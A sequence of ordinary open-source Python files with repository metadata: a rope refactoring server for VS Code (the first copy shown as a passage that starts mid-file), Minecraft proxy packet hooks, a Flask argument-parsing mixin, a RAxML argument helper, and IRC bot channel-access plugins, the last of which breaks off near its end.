    # difflib does not emit "newline at end of file" noise.
    # https://github.com/Microsoft/vscode-python/issues/695.
    old_lines = old.splitlines(True)
    # FIX: guard against empty old content (e.g. a new file) — indexing
    # old_lines[-1] on an empty list raised IndexError.
    if old_lines and not old_lines[-1].endswith('\n'):
        old_lines[-1] = old_lines[-1] + os.linesep
        new = new + os.linesep
    result = difflib.unified_diff(
        old_lines, new.splitlines(True),
        'a/' + changeset.resource.path, 'b/' + changeset.resource.path)
    return ''.join(result)
class BaseRefactoring(object):
    """
    Common scaffolding shared by all refactorings.

    Subclasses implement onRefactor(); this base class wires up a rope task
    handle so progress can be reported through an optional callback, and
    collects the resulting Change objects in ``self.changes``.
    """
    def __init__(self, project, resource, name="Refactor", progressCallback=None):
        self._progressCallback = progressCallback
        self._handle = rope.base.taskhandle.TaskHandle(name)
        self._handle.add_observer(self._update_progress)
        self.project = project
        self.resource = resource
        self.changes = []

    def _update_progress(self):
        """Translate rope's job-set state into a RefactorProgress callback."""
        jobset = self._handle.current_jobset()
        # Nothing to report without an active job set or a listener.
        if not jobset or self._progressCallback is None:
            return
        progress = RefactorProgress()
        current_name = jobset.get_name()
        if current_name is not None:
            progress.name = current_name
        active_job = jobset.get_active_job_name()
        if active_job is not None:
            progress.message = active_job
        done = jobset.get_percent_done()
        if done is not None:
            progress.percent = done
        self._progressCallback(progress)

    def stop(self):
        """Ask rope to interrupt the running task."""
        self._handle.stop()

    def refactor(self):
        """Execute the refactoring, swallowing user-initiated cancellation."""
        try:
            self.onRefactor()
        except rope.base.exceptions.InterruptedTaskError:
            # The user cancelled the refactoring; nothing more to do.
            pass

    def onRefactor(self):
        """Hook implemented by each concrete refactoring."""
        pass
class RenameRefactor(BaseRefactoring):
    """Rename the symbol at a given offset to a new name, project-wide."""

    def __init__(self, project, resource, name="Rename", progressCallback=None, startOffset=None, newName="new_Name"):
        BaseRefactoring.__init__(self, project, resource,
                                 name, progressCallback)
        self._newName = newName
        self.startOffset = startOffset

    def onRefactor(self):
        """Run rope's Rename and record a diff for every changed file."""
        rename_op = Rename(self.project, self.resource, self.startOffset)
        change_set = rename_op.get_changes(self._newName, task_handle=self._handle)
        for entry in change_set.changes:
            if not isinstance(entry, rope.base.change.ChangeContents):
                raise Exception('Unknown Change')
            self.changes.append(
                Change(entry.resource.real_path, ChangeType.EDIT, get_diff(entry)))
class ExtractVariableRefactor(BaseRefactoring):
    """Extract the selected expression into a new variable."""

    def __init__(self, project, resource, name="Extract Variable", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
        BaseRefactoring.__init__(self, project, resource,
                                 name, progressCallback)
        self._newName = newName
        self._startOffset = startOffset
        self._endOffset = endOffset
        self._similar = similar
        self._global = global_

    def onRefactor(self):
        """Run rope's ExtractVariable and record a diff per changed file."""
        extract_op = ExtractVariable(
            self.project, self.resource, self._startOffset, self._endOffset)
        change_set = extract_op.get_changes(
            self._newName, self._similar, self._global)
        for entry in change_set.changes:
            if not isinstance(entry, rope.base.change.ChangeContents):
                raise Exception('Unknown Change')
            self.changes.append(
                Change(entry.resource.real_path, ChangeType.EDIT, get_diff(entry)))
class ExtractMethodRefactor(ExtractVariableRefactor):
    """Extract the selected statements into a new method."""

    def __init__(self, project, resource, name="Extract Method", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
        ExtractVariableRefactor.__init__(self, project, resource,
                                         name, progressCallback, startOffset=startOffset, endOffset=endOffset, newName=newName, similar=similar, global_=global_)

    def onRefactor(self):
        """Run rope's ExtractMethod and record a diff per changed file."""
        extract_op = ExtractMethod(
            self.project, self.resource, self._startOffset, self._endOffset)
        change_set = extract_op.get_changes(
            self._newName, self._similar, self._global)
        for entry in change_set.changes:
            if not isinstance(entry, rope.base.change.ChangeContents):
                raise Exception('Unknown Change')
            self.changes.append(
                Change(entry.resource.real_path, ChangeType.EDIT, get_diff(entry)))
class RopeRefactoring(object):
    """Serves refactor requests read line-by-line from stdin.

    Each request is one JSON line naming a refactor kind ('rename',
    'extract_variable' or 'extract_method') plus its arguments; results are
    written back to stdout as JSON.
    """

    def __init__(self):
        self.default_sys_path = sys.path
        # Requests arrive line-by-line on stdin, UTF-8 encoded.
        self._input = io.open(sys.stdin.fileno(), encoding='utf-8')

    def _run_refactor(self, make_refactor, filePath, indent_size):
        """Open the rope project, run one refactoring and collect its diffs.

        Shared implementation for _rename/_extractVariable/_extractMethod,
        which previously duplicated this sequence verbatim.

        Args:
            make_refactor: Callable (project, resource) -> BaseRefactoring.
            filePath: Path of the file being refactored.
            indent_size: Indentation width to configure rope with.

        Returns:
            List of {'diff': ...} dictionaries, one per changed file.
        """
        project = rope.base.project.Project(
            WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False, indent_size=indent_size)
        try:
            resourceToRefactor = libutils.path_to_resource(project, filePath)
            refactor = make_refactor(project, resourceToRefactor)
            refactor.refactor()
            changes = refactor.changes
        finally:
            # Always release the project, even if the refactor raised.
            project.close()
        return [{'diff': change.diff} for change in changes]

    def _rename(self, filePath, start, newName, indent_size):
        """
        Renames a variable
        """
        return self._run_refactor(
            lambda project, resource: RenameRefactor(
                project, resource, startOffset=start, newName=newName),
            filePath, indent_size)

    def _extractVariable(self, filePath, start, end, newName, indent_size):
        """
        Extracts a variable
        """
        return self._run_refactor(
            lambda project, resource: ExtractVariableRefactor(
                project, resource, startOffset=start, endOffset=end, newName=newName, similar=True),
            filePath, indent_size)

    def _extractMethod(self, filePath, start, end, newName, indent_size):
        """
        Extracts a method
        """
        return self._run_refactor(
            lambda project, resource: ExtractMethodRefactor(
                project, resource, startOffset=start, endOffset=end, newName=newName, similar=True),
            filePath, indent_size)

    def _serialize(self, identifier, results):
        """
        Serializes the refactor results
        """
        return json.dumps({'id': identifier, 'results': results})

    def _deserialize(self, request):
        """Deserialize request from VSCode.

        Args:
            request: String with raw request from VSCode.

        Returns:
            Python dictionary with request data.
        """
        return json.loads(request)

    def _process_request(self, request):
        """Accept serialized request from VSCode and write response.
        """
        request = self._deserialize(request)
        lookup = request.get('lookup', '')
        if lookup == '':
            # Unknown/empty request: ignored, matching historical behaviour.
            pass
        elif lookup == 'rename':
            changes = self._rename(request['file'], int(
                request['start']), request['name'], int(request['indent_size']))
            return self._write_response(self._serialize(request['id'], changes))
        elif lookup == 'extract_variable':
            changes = self._extractVariable(request['file'], int(
                request['start']), int(request['end']), request['name'], int(request['indent_size']))
            return self._write_response(self._serialize(request['id'], changes))
        elif lookup == 'extract_method':
            changes = self._extractMethod(request['file'], int(
                request['start']), int(request['end']), request['name'], int(request['indent_size']))
            return self._write_response(self._serialize(request['id'], changes))

    def _write_response(self, response):
        """Write one response line to stdout and flush immediately."""
        sys.stdout.write(response + '\n')
        sys.stdout.flush()

    def watch(self):
        """Main loop: announce readiness, then serve requests until killed."""
        self._write_response("STARTED")
        while True:
            try:
                self._process_request(self._input.readline())
            except Exception:
                # FIX: was a bare "except:", which also swallowed
                # KeyboardInterrupt/SystemExit and made the process hard to
                # interrupt. Report the failure to the editor, keep serving.
                exc_type, exc_value, exc_tb = sys.exc_info()
                tb_info = traceback.extract_tb(exc_tb)
                jsonMessage = {'error': True, 'message': str(exc_value), 'traceback': str(tb_info), 'type': str(exc_type)}
                sys.stderr.write(json.dumps(jsonMessage))
                sys.stderr.flush()
# Script entry point: start serving refactor requests over stdio.
if __name__ == '__main__':
    RopeRefactoring().watch()
| {
"repo_name": "jwatson/dotfiles",
"path": "config/coc/extensions/node_modules/coc-python/pythonFiles/refactor.py",
"copies": "1",
"size": "10906",
"license": "mit",
"hash": -5576505466185262000,
"line_mean": 34.9933993399,
"line_max": 174,
"alpha_frac": 0.6114982578,
"autogenerated": false,
"ratio": 4.1930026912725875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0024357789264730124,
"num_lines": 303
} |
# Arguments are:
# 1. Working directory.
# 2. Rope folder
import io
import sys
import json
import traceback
import rope
from rope.base import libutils
from rope.refactor.rename import Rename
from rope.refactor.extract import ExtractMethod, ExtractVariable
import rope.base.project
import rope.base.taskhandle
# Positional CLI arguments: the workspace root directory and the rope
# project folder to use inside it.
WORKSPACE_ROOT = sys.argv[1]
ROPE_PROJECT_FOLDER = sys.argv[2]
class RefactorProgress():
    """
    Describes how far a refactor task has progressed: the task name, an
    optional human-readable message, and the percent of work done.
    """

    def __init__(self, name='Task Name', message=None, percent=0):
        # Plain data holder; arguments are stored as-is.
        self.name = name
        self.percent = percent
        self.message = message
class ChangeType():
    """
    Change Type Enum

    Integer codes describing how a file is affected by a refactoring.
    """
    # File contents are modified in place.
    EDIT = 0
    # A new file is created.
    NEW = 1
    # An existing file is removed.
    DELETE = 2
class Change():
    """
    One file change produced by a refactoring: file path, change kind
    (EDIT/NEW/DELETE code) and the textual description/diff.
    """
    # Mirrors ChangeType; kept so callers can also write Change.EDIT etc.
    EDIT = 0
    NEW = 1
    DELETE = 2

    def __init__(self, filePath, fileMode=ChangeType.EDIT, diff=""):
        self.filePath = filePath
        self.fileMode = fileMode
        self.diff = diff
class BaseRefactoring(object):
    """
    Base class shared by all refactorings: wires a rope task handle to an
    optional progress callback and accumulates Change objects in
    ``self.changes``. Subclasses implement onRefactor().
    """
    def __init__(self, project, resource, name="Refactor", progressCallback=None):
        self._progressCallback = progressCallback
        self._handle = rope.base.taskhandle.TaskHandle(name)
        self._handle.add_observer(self._update_progress)
        self.project = project
        self.resource = resource
        self.changes = []

    def _update_progress(self):
        """Forward rope job-set state to the progress callback, if any."""
        jobset = self._handle.current_jobset()
        if not jobset or self._progressCallback is None:
            return
        progress = RefactorProgress()
        jobset_name = jobset.get_name()
        if jobset_name is not None:
            progress.name = jobset_name
        active_name = jobset.get_active_job_name()
        if active_name is not None:
            progress.message = active_name
        percent_done = jobset.get_percent_done()
        if percent_done is not None:
            progress.percent = percent_done
        self._progressCallback(progress)

    def stop(self):
        """Ask rope to interrupt the running task."""
        self._handle.stop()

    def refactor(self):
        """Execute the refactoring, swallowing user cancellation."""
        try:
            self.onRefactor()
        except rope.base.exceptions.InterruptedTaskError:
            # The user cancelled the refactoring; nothing more to do.
            pass

    def onRefactor(self):
        """Hook implemented by each concrete refactoring."""
        pass
class RenameRefactor(BaseRefactoring):
    """Rename the symbol at a given offset to a new name, project-wide."""

    def __init__(self, project, resource, name="Rename", progressCallback=None, startOffset=None, newName="new_Name"):
        BaseRefactoring.__init__(self, project, resource,
                                 name, progressCallback)
        self._newName = newName
        self.startOffset = startOffset

    def onRefactor(self):
        """Run rope's Rename and record each content change."""
        rename_op = Rename(self.project, self.resource, self.startOffset)
        change_set = rename_op.get_changes(self._newName, task_handle=self._handle)
        for entry in change_set.changes:
            if not isinstance(entry, rope.base.change.ChangeContents):
                raise Exception('Unknown Change')
            self.changes.append(
                Change(entry.resource.real_path, ChangeType.EDIT, entry.get_description()))
class ExtractVariableRefactor(BaseRefactoring):
    """Extract the selected expression into a new variable."""

    def __init__(self, project, resource, name="Extract Variable", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
        BaseRefactoring.__init__(self, project, resource,
                                 name, progressCallback)
        self._newName = newName
        self._startOffset = startOffset
        self._endOffset = endOffset
        self._similar = similar
        self._global = global_

    def onRefactor(self):
        """Run rope's ExtractVariable and record each content change."""
        extract_op = ExtractVariable(
            self.project, self.resource, self._startOffset, self._endOffset)
        change_set = extract_op.get_changes(
            self._newName, self._similar, self._global)
        for entry in change_set.changes:
            if not isinstance(entry, rope.base.change.ChangeContents):
                raise Exception('Unknown Change')
            self.changes.append(
                Change(entry.resource.real_path, ChangeType.EDIT, entry.get_description()))
class ExtractMethodRefactor(ExtractVariableRefactor):
    """Extract the selected statements into a new method."""

    def __init__(self, project, resource, name="Extract Method", progressCallback=None, startOffset=None, endOffset=None, newName="new_Name", similar=False, global_=False):
        ExtractVariableRefactor.__init__(self, project, resource,
                                         name, progressCallback, startOffset=startOffset, endOffset=endOffset, newName=newName, similar=similar, global_=global_)

    def onRefactor(self):
        """Run rope's ExtractMethod and record each content change."""
        extract_op = ExtractMethod(
            self.project, self.resource, self._startOffset, self._endOffset)
        change_set = extract_op.get_changes(
            self._newName, self._similar, self._global)
        for entry in change_set.changes:
            if not isinstance(entry, rope.base.change.ChangeContents):
                raise Exception('Unknown Change')
            self.changes.append(
                Change(entry.resource.real_path, ChangeType.EDIT, entry.get_description()))
class RopeRefactoring(object):
    """Reads refactor requests (one JSON line each) from stdin and writes
    JSON results to stdout."""

    def __init__(self):
        self.default_sys_path = sys.path
        # Requests arrive line-by-line on stdin, UTF-8 encoded.
        self._input = io.open(sys.stdin.fileno(), encoding='utf-8')

    def _run_refactor(self, make_refactor, filePath):
        """Open the rope project, run one refactoring and collect its diffs.

        Shared implementation for _extractVariable/_extractMethod, which
        previously duplicated this sequence verbatim.

        Args:
            make_refactor: Callable (project, resource) -> BaseRefactoring.
            filePath: Path of the file being refactored.

        Returns:
            List of {'diff': ...} dictionaries, one per changed file.
        """
        project = rope.base.project.Project(WORKSPACE_ROOT, ropefolder=ROPE_PROJECT_FOLDER, save_history=False)
        try:
            resourceToRefactor = libutils.path_to_resource(project, filePath)
            refactor = make_refactor(project, resourceToRefactor)
            refactor.refactor()
            changes = refactor.changes
        finally:
            # Always release the project, even if the refactor raised.
            project.close()
        return [{'diff': change.diff} for change in changes]

    def _extractVariable(self, filePath, start, end, newName):
        """
        Extracts a variable
        """
        return self._run_refactor(
            lambda project, resource: ExtractVariableRefactor(
                project, resource, startOffset=start, endOffset=end, newName=newName),
            filePath)

    def _extractMethod(self, filePath, start, end, newName):
        """
        Extracts a method
        """
        return self._run_refactor(
            lambda project, resource: ExtractMethodRefactor(
                project, resource, startOffset=start, endOffset=end, newName=newName),
            filePath)

    def _serialize(self, identifier, results):
        """
        Serializes the refactor results
        """
        return json.dumps({'id': identifier, 'results': results})

    def _deserialize(self, request):
        """Deserialize request from VSCode.

        Args:
            request: String with raw request from VSCode.

        Returns:
            Python dictionary with request data.
        """
        return json.loads(request)

    def _process_request(self, request):
        """Accept serialized request from VSCode and write response.
        """
        request = self._deserialize(request)
        lookup = request.get('lookup', '')
        if lookup == '':
            # Unknown/empty request: ignored, matching historical behaviour.
            pass
        elif lookup == 'extract_variable':
            changes = self._extractVariable(request['file'], int(request['start']), int(request['end']), request['name'])
            return self._write_response(self._serialize(request['id'], changes))
        elif lookup == 'extract_method':
            changes = self._extractMethod(request['file'], int(request['start']), int(request['end']), request['name'])
            return self._write_response(self._serialize(request['id'], changes))

    def _write_response(self, response):
        """Write one response line to stdout and flush immediately."""
        sys.stdout.write(response + '\n')
        sys.stdout.flush()

    def watch(self):
        """Main loop: announce readiness, then serve requests until killed."""
        self._write_response("STARTED")
        while True:
            try:
                self._process_request(self._input.readline())
            except Exception as ex:
                # FIX: "ex.message" does not exist on Python 3 (and on most
                # Python 2 exception types either); use str(ex) instead.
                message = str(ex) + ' \n' + traceback.format_exc()
                sys.stderr.write(str(len(message)) + ':' + message)
                sys.stderr.flush()
# Script entry point: start serving refactor requests over stdio.
if __name__ == '__main__':
    RopeRefactoring().watch()
| {
"repo_name": "DonJayamanne/pythonVSCode",
"path": "src/test/pythonFiles/refactoring/standAlone/refactor.py",
"copies": "1",
"size": "8579",
"license": "mit",
"hash": -5974611509158667000,
"line_mean": 34.0163265306,
"line_max": 174,
"alpha_frac": 0.6128919454,
"autogenerated": false,
"ratio": 4.278802992518703,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00127521151296757,
"num_lines": 245
} |
# Hook arguments are:
#  packetid     unsigned byte   ID of packet
#  packet       dict            decoded packet
#  serverprops  class           see mcproxy.py for details
# NOTE(review): the original comment also listed serverqueue/clientqueue
# ("use these to insert new packets"), but the hooks defined below take only
# the three arguments above — confirm against mcproxy.py's dispatch code.
import positioning, gui, mcpackets
import positioning, gui, mcpackets
def timeHook(packetid, packet, serverprops):
    """Convert the server's raw time ticks to an (hour, minute) clock and
    show it on the GUI time label."""
    raw_ticks = packet['time']
    # 0 ticks corresponds to 6:00, hence the +6000 offset; 1000 ticks/hour.
    clock_hour = int(((raw_ticks + 6000) % 24000) / 1000)
    clock_minute = int(((raw_ticks % 1000) / 1000.0) * 60.0)
    serverprops.playerdata['time'] = (clock_hour, clock_minute)
    serverprops.gui['time'].setText("%i:%.2i" % serverprops.playerdata['time'])
def playerPosHook(packetid, packet, serverprops):
    """Record the player's coordinates and refresh the GUI position label."""
    position = (packet['x'], packet['y'], packet['z'])
    serverprops.playerdata['location'] = position
    serverprops.gui['pos'].setText("X: %.2f\nY: %.2f\nZ: %.2f" % serverprops.playerdata['location'])
    gui.playerDataUpdate(serverprops)
def playerLookHook(packetid, packet, serverprops):
    """Record the player's view angle and refresh the GUI angle label."""
    serverprops.playerdata['angle'] = (packet['rotation'], packet['pitch'])
    rotation, pitch = serverprops.playerdata['angle']
    normalized_rotation = positioning.sane_angle(rotation)
    label_text = "Rotation: %i\nPitch: %i\nDirection: %s" % (
        normalized_rotation, pitch, positioning.humanReadableAngle(packet['rotation']))
    serverprops.gui['angle'].setText(label_text)
    gui.playerDataUpdate(serverprops)
def timeChangeHook(packetid, packet, serverprops):
    """Pin the client's world clock by rewriting every time packet to 9000
    ticks (mid-day). Returns the mutated packet for re-injection."""
    packet['time'] = 9000
    return packet
def viewCustomEntities(packetid, packet, serverprops):
    """Dump a complex entity's NBT payload to stdout for inspection."""
    # Local imports: StringIO is the Python 2 module; nbt is optional.
    from StringIO import StringIO
    from nbt import NBTFile
    from gzip import GzipFile
    print("@x:%i,y:%i,z%i"%(packet['x'],packet['y'],packet['z']))
    # The payload is a gzip-compressed NBT blob.
    decoded = NBTFile(buffer=GzipFile(fileobj=StringIO(packet['payload'])))
    print(decoded.pretty_tree())
def spawnHook(packetid, packet, serverprops):
    """Register the world spawn point as a waypoint and refresh the GUI."""
    spawn_location = (packet['x'], packet['y'], packet['z'])
    serverprops.waypoint['Spawn'] = spawn_location
    serverprops.gui['wplist'].addItem("Spawn")
    gui.playerDataUpdate(serverprops)
    positioning.loadWaypoints(serverprops)
# Last known full main-inventory payload; updated by inventoryTracker.
current_inv = {}
def inventoryTracker(packetid, packet, serverprops):
    """Record the player's main inventory (inventory packet type 1).

    FIX: declare ``current_inv`` as global — previously the assignment
    below bound a function-local name that was immediately discarded, so
    the module-level tracker state was never updated.
    """
    global current_inv
    if packet['type'] == 1:
        current_inv = packet['items']
# Registry of all available hooks: maps a friendly hook name to the hook
# function and the packet name (resolved via mcpackets.name_to_id) that the
# hook should be attached to.
namedhooks = {
    'timeHook': { 'func': timeHook, 'packet': 'time'},
    'playerPosHook': { 'func': playerPosHook, 'packet': 'playerposition'},
    'playerLookHook': { 'func': playerLookHook, 'packet': 'playerlook'},
    'viewCustomEntities':{'func':viewCustomEntities,'packet': 'complexent'},
    'inventoryTracker': { 'func': inventoryTracker, 'packet': 'inventory'},
    'timeChangeHook': {'func': timeChangeHook, 'packet': 'time'},
    'spawnPosition': {'func': spawnHook, 'packet': 'spawnposition'},
}
# Reverse lookup (hook function -> hook name), used when detaching hooks.
hook_to_name = dict([(namedhooks[id]['func'], id) for id in namedhooks])
def addHook(serverprops, hookname):
    """Attach the named hook to its packet decoder and move the name from
    the available-hooks menu to the active-hooks menu."""
    if hookname not in namedhooks:
        print("hook %s not found" % hookname)
        return
    hook_entry = namedhooks[hookname]
    packet_name = hook_entry['packet']
    hook_func = hook_entry['func']
    mcpackets.decoders[mcpackets.name_to_id[packet_name]]['hooks'].append(hook_func)
    gui.removeFromMenu(serverprops.gui['hooklist'], hookname)
    serverprops.gui['hookactive'].addItem(hookname)
def removeHook(serverprops, hookname):
    """Detach the named hook from every packet decoder and move the name
    from the active-hooks menu back to the available-hooks menu.

    FIX: iterate over a snapshot of each decoder's hook list — the
    original removed elements from the list while iterating it, which
    skips the element immediately following each removal.
    """
    for decoder in mcpackets.decoders.values():
        for hook in list(decoder['hooks']):
            if hook_to_name[hook] == hookname:
                decoder['hooks'].remove(hook)
    gui.removeFromMenu(serverprops.gui['hookactive'], hookname)
    serverprops.gui['hooklist'].addItem(hookname)
def setupInitialHooks(serverprops):
    """Populate the available-hooks menu and enable the default hook set."""
    for hook_name in namedhooks:
        serverprops.gui['hooklist'].addItem(hook_name)
    # Hooks enabled by default at startup, in this order.
    for default_hook in ('timeHook', 'playerPosHook', 'playerLookHook', 'spawnPosition'):
        addHook(serverprops, default_hook)
"repo_name": "gm-stack/mcproxy",
"path": "branches/guifix/mcproxy/hooks.py",
"copies": "1",
"size": "3475",
"license": "mit",
"hash": -2566379692144152600,
"line_mean": 38.5,
"line_max": 142,
"alpha_frac": 0.728057554,
"autogenerated": false,
"ratio": 3.0806737588652484,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4308731312865248,
"avg_score": null,
"num_lines": null
} |
"""Arguments parsing"""
from copy import deepcopy
from functools import wraps
from webargs.flaskparser import FlaskParser
class ArgumentsMixin:
    """Extend Blueprint to add arguments parsing feature"""

    ARGUMENTS_PARSER = FlaskParser()

    def arguments(
            self, schema, *, location='json', content_type=None, required=True,
            description=None, example=None, examples=None, **kwargs
    ):
        """Decorator specifying the schema used to deserialize parameters

        :param type|Schema schema: Marshmallow ``Schema`` class or instance
            used to deserialize and validate the argument.
        :param str location: Location of the argument.
        :param str content_type: Content type of the argument (documentation
            only). Should only be used with ``json``, ``form`` or ``files``
            locations; defaults per location are set in
            ``Blueprint.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING``.
        :param bool required: Whether argument is required (default: True).
        :param str description: Argument description.
        :param dict example: Parameter example.
        :param list examples: List of parameter examples.
        :param dict kwargs: Keyword arguments forwarded to webargs's
            :meth:`use_args <webargs.core.Parser.use_args>`.

        ``required`` and ``description`` only affect body/requestBody
        arguments; for other locations the schema is expanded into a list
        of parameters whose values come from the schema fields.
        ``example`` and ``examples`` are mutually exclusive and should only
        be used with OpenAPI 3 and the ``json`` location.

        See :doc:`Arguments <arguments>`.
        """
        # The schema instance is stored in the doc dict for now; it is
        # replaced later on by $ref or json.
        doc_param = {
            'in': location,
            'required': required,
            'schema': schema,
        }
        # Optional documentation-only attributes, added in a fixed order.
        for key, value in (
                ('content_type', content_type),
                ('example', example),
                ('examples', examples),
                ('description', description),
        ):
            if value is not None:
                doc_param[key] = value

        def decorator(func):
            @wraps(func)
            def wrapper(*f_args, **f_kwargs):
                return func(*f_args, **f_kwargs)
            # Record the parameter in the function's apidoc info.
            # deepcopy avoids mutating the wrapped function's own doc.
            wrapper._apidoc = deepcopy(getattr(wrapper, '_apidoc', {}))
            wrapper._apidoc.setdefault('parameters', []).append(doc_param)
            # Let webargs inject the parsed arguments into the function.
            return self.ARGUMENTS_PARSER.use_args(
                schema, locations=[location], **kwargs)(wrapper)

        return decorator
| {
"repo_name": "Nobatek/flask-rest-api",
"path": "flask_rest_api/arguments.py",
"copies": "1",
"size": "3261",
"license": "mit",
"hash": -6077204903436500000,
"line_mean": 40.8076923077,
"line_max": 79,
"alpha_frac": 0.6335479914,
"autogenerated": false,
"ratio": 4.925981873111782,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 78
} |
#Arguments_RAxML.py
#version 1.0.1
# For use with runRAxML.py
# Only very limited options have been coded.
import os, optparse
def getParser():
    """Return an optparse.OptionParser for the RAxML wrapper.

    Only the raw command string (-R) is exposed.  Individual RAxML flags
    (-x rapid-bootstrap seed, -p parsimony seed, -N number of runs,
    -k bootstrap branch lengths, -f algorithm, -m substitution model,
    -s data filename, -n output filename) used to be separate options;
    they are now passed inside the quoted -R string instead.
    """
    parser = optparse.OptionParser()
    parser.add_option('-R', dest='RAxMLCommand', default="-f a",
                      help='RAxML command in quotes.')
    return parser
def buildArgList(whichArgs, options):
    """Build the argument string for later submit files.

    :param whichArgs: iterable of single-letter flag codes; only "R" is
        currently honored.
    :param options: parsed options object with a ``RAxMLCommand`` attribute.
    :return: the assembled argument string (empty if no flags matched).

    Fix: the original had a second, unreachable ``return args`` after the
    first one (with the legacy per-flag handling commented out between
    them); collapsed to a single return.  Legacy flags (-x, -p, -N, -k,
    -f, -m, -s, -n) are folded into the quoted -R string -- see getParser().
    """
    args = ""
    if "R" in whichArgs:
        args += options.RAxMLCommand
    return args
| {
"repo_name": "BotanyHunter/RAxML",
"path": "arguments_RAxML.py",
"copies": "1",
"size": "2194",
"license": "mit",
"hash": 1632224071733857500,
"line_mean": 48.8636363636,
"line_max": 142,
"alpha_frac": 0.5683682771,
"autogenerated": false,
"ratio": 3.4936305732484074,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9318447666880807,
"avg_score": 0.04871023669352015,
"num_lines": 44
} |
# Plugin metadata consumed by the sonicbot plugin loader.
arguments = ["self", "info", "args"]  # parameters the bot passes to main()
helpstring = "chanadduser <nick>"  # usage string shown by the help command
minlevel = 3  # minimum user level required to run this command
def main(connection, info, args) :
    """Adds a user to the channel sonicbot access list

    args[1] is the nick to add.  The target must already be registered
    (userlevel >= 2); a level-2 user is promoted to level 3 so the
    per-channel access list applies to them.

    Fix: replaced the Python-2-only ``dict.has_key()`` with the ``in``
    operator (same behavior, also works on Python 3).
    """
    if args[1] in connection.users["users"] :
        if connection.users["users"][args[1]]["userlevel"] >= 2 :
            # Promote plain registered users (level 2) to channel-capable (3).
            if connection.users["users"][args[1]]["userlevel"] == 2 :
                connection.users["users"][args[1]]["userlevel"] = 3
                connection.users.sync()
            # Lazily create the per-user channel list.
            if "channels" not in connection.users["users"][args[1]] :
                connection.users["users"][args[1]]["channels"] = []
                connection.users.sync()
            if info["channel"] not in connection.users["users"][args[1]]["channels"] :
                connection.users["users"][args[1]]["channels"].append(info["channel"])
                connection.users.sync()
                connection.ircsend(info["channel"], _("Added %(nick)s to the %(channel)s sonicbot access list.") % dict(nick=args[1], channel=info["channel"]))
            else :
                connection.ircsend(info["channel"], _("That user is already on this channel's sonicbot access list"))
        else : connection.ircsend(info["channel"], _("That user is not yet registered!"))
    else : connection.ircsend(info["channel"], _("That user is not yet registered!"))
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/chanadduser.py",
"copies": "1",
"size": "1339",
"license": "bsd-3-clause",
"hash": 5893471017838653000,
"line_mean": 59.8636363636,
"line_max": 159,
"alpha_frac": 0.5892457058,
"autogenerated": false,
"ratio": 3.997014925373134,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5086260631173134,
"avg_score": null,
"num_lines": null
} |
# Plugin metadata consumed by the sonicbot plugin loader.
arguments = ["self", "info", "args"]  # parameters the bot passes to main()
helpstring = "chanreg"  # usage string shown by the help command
minlevel = 2  # minimum user level required to run this command
def main(connection, info, args) :
    """Registers a channel with sonicbot

    The sender must have at least half-ops in the channel (see auth()).
    A level-2 sender is promoted to level 3, the channel is added to the
    sender's channel list, and the channel is flagged as registered.

    Fix: replaced the Python-2-only ``dict.has_key()`` with the ``in``
    operator (same behavior, also works on Python 3).
    """
    if auth(connection, info) :
        # Promote plain registered users (level 2) to channel-capable (3).
        if connection.users["users"][info["sender"]]["userlevel"] == 2 :
            connection.users["users"][info["sender"]]["userlevel"] = 3
            connection.users.sync()
        # Lazily create the sender's channel list.
        if "channels" not in connection.users["users"][info["sender"]] :
            connection.users["users"][info["sender"]]["channels"] = []
            connection.users.sync()
        if info["channel"] not in connection.users["users"][info["sender"]]["channels"] :
            connection.users["users"][info["sender"]]["channels"].append(info["channel"])
            connection.users.sync()
            connection.users["channels"][info["channel"]]["registered"] = True
            connection.users.sync()
            connection.msg(info["channel"], _("%(sender)s: You have just registered %(channel)s") % dict(sender=info["sender"], channel=info["channel"]))
        else : connection.msg(info["channel"], _("%(sender)s: You are already on this channel's sonicbot access list!") % dict(sender=info["sender"]))
    else : connection.msg(info["channel"], _("%(sender)s: You do not have at least half-ops on this channel. If this is an error, please kick me and invite me again.") % dict(sender=info["sender"]))
def auth(connection, info) :
    """Return True if the sender has at least half-ops in the channel.

    Half-ops-or-better is indicated by any of the mode prefix characters
    '!', '~', '@', '%', '&' in the sender's channel mode string.
    """
    privileged = ("!", "~", "@", "%", "&")
    modes = connection.chanmodes[info["channel"]][info["sender"]]
    return any(mode in privileged for mode in modes)
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/chanreg.py",
"copies": "1",
"size": "1653",
"license": "bsd-3-clause",
"hash": -6766384353274021000,
"line_mean": 58.0357142857,
"line_max": 199,
"alpha_frac": 0.6110102843,
"autogenerated": false,
"ratio": 3.983132530120482,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5094142814420483,
"avg_score": null,
"num_lines": null
} |
# Plugin metadata consumed by the sonicbot plugin loader.
arguments = ["self", "info", "args"]  # parameters the bot passes to main()
minlevel = 3  # minimum user level required to run this command
helpstring = "disable <plugin>"  # usage string shown by the help command
def main(connection, info, args) :
    """Disables a plugin in the current channel.

    args[1] is a plugin name, or "*" to disable every plugin.  The
    enable/disable commands themselves can never be disabled.

    Fixes: removed a leftover Python-2 ``print plugin`` debug statement,
    and wrapped the "not enabled" message in _() for localization,
    consistent with every other message in this plugin (and enable.py).
    """
    if args[1] not in ["disable", "enable", "*"] :
        if args[1] in connection.users["channels"][info["channel"]]["enabled"] :
            connection.users["channels"][info["channel"]]["enabled"].remove(args[1])
            connection.users.sync()
            connection.ircsend(info["channel"], _("The %(pluginname)s plugin has been disabled in this channel") % dict(pluginname=args[1]))
        else : connection.ircsend(info["channel"], _("That plugin is not enabled!"))
